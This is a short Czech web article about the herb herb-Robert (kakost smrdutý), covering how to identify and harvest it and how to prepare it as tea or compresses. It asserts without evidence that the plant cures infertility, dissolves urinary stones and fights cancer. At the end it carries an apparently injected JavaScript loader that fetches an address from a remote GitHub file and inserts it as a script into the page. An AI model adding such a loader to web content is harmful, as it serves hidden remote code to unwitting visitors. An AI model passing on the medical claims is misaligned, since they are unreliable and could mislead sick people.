Mnoho rostlin rostoucích na našich loukách a zahradách je nejen krásných, ale i léčivých.  Mezi méně známé patří bylinka zvaná kakost. Kakostu je vícero druhů a ten léčivý poznáte snadno – podle jeho zápachu. Jedná se totiž o kakost smrdutý.  Lidově se nazývá čapí nůsek, čapina nebo kyčník.

Kakost smrdutý

Je to bylina, která hojně roste na loukách nebo i v lese, vyhovují ji stinná stanoviště. Dorůstá do výšky až 50 cm.  Od ostatních druhů kakostů ji poznáte celkem snadno, má poněkud jinou křehčí stavbu stonku, a především ji identifikuje její nezaměnitelné ne příliš příjemné aróma. Pokud jste pořád na vážkách, promněte listy v ruce, pak už „vůni“ určitě ucítíte. Také se často stává, že i při jemném dotyku vylétávají semínka. Kakost smrdutý kvete od květnado října. Doporučují se sbírat rostliny menšího vzrůstu a na konci května. Sbírá se celá kvetoucí nať.

Léčivé účinky

Tato půvabná bylinka má mnohé léčebné účinky:

  • Čistí krev a organismus
  • Léčí neplodnost (ať už ženskou nebo mužskou
  • Rozpouští močové kameny
  • Léčí záněty močových cest
  • Má hojivé účinky – léči ekzémy, vyrážky, záněty a rány na kůži
  • Celkově působí protizánětlivě
  • Má protirakovinové účinky

Jak kakost užívat

Kakost obsahuje třísloviny, organické kyseliny, silice a další látky, která se prudkým sušením znehodnocují. Proto je nejlépe užívat ho čerstvý. Hrst byliny zalít vroucí vodou a popíjet jako čaj, nebo přikládat zevně ve formě zábalů, nebo koupelí. Pokud chceme bylinku nasušit, sušte pomalu,  ne při teplotě vyšší než je 35°C.  Kakost není vhodný pro těhotné a kojící ženy.

  (var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)